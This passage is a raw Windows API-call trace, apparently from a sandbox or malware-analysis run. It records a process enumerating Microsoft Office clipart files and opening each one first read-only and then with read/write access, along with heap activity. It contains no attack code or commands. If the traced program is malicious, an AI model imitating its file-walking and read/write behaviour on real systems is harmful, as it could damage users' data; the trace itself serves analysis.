RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.319] AreFileApisANSI () returned 1 [0103.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0103.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0103.319] AreFileApisANSI () returned 1 [0103.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 69 [0103.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.320] GetFileType (hFile=0x33c) returned 0x1 [0103.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.320] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.320] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.320] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.321] CloseHandle (hObject=0x33c) returned 1 [0103.321] AreFileApisANSI () returned 1 [0103.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 69 [0103.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.321] GetFileType (hFile=0x33c) returned 0x1 [0103.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.321] CloseHandle (hObject=0x33c) returned 1 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.495] AreFileApisANSI () returned 1 [0103.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0103.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 69 [0103.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4)) returned 1 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0103.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.495] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00442_.WMF", cAlternateFileName="")) returned 1 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0103.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0103.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.496] AreFileApisANSI () returned 1 [0103.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0103.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.497] AreFileApisANSI () returned 1 [0103.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 69 [0103.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.497] GetFileType (hFile=0x33c) returned 0x1 [0103.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.498] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.498] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.498] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.498] CloseHandle (hObject=0x33c) returned 1 [0103.498] AreFileApisANSI () returned 1 [0103.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0103.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 69 [0103.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.498] GetFileType (hFile=0x33c) returned 0x1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.499] CloseHandle (hObject=0x33c) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.500] AreFileApisANSI () returned 1 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 69 [0103.500] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, 